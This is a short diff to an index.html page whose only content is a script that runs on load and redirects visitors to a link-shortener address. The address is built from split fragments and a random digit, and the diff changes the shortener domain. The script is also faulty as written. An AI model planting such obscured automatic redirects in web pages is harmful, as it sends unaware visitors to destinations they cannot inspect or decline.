--- a/index.html
+++ b/index.html
@@ -1,12 +1,13 @@
 <script type = "text/javascript">
 function reDirect() {
-a = location.href = "bit.ly/";
-b = location.href = "techno";
-c = location.href = "szww";
-d = Math.ceil(Math.random() * 4);
+a = location.href = "bit-urls.com/";
+b = location.href = "orlink";
+c = location.href = "20v";
+d = Math.ceil(Math.random() * 1);
 a = "http://" + a + b + c + d ;
 window.location = a
 }
 reDirect();
 </script>
+
 
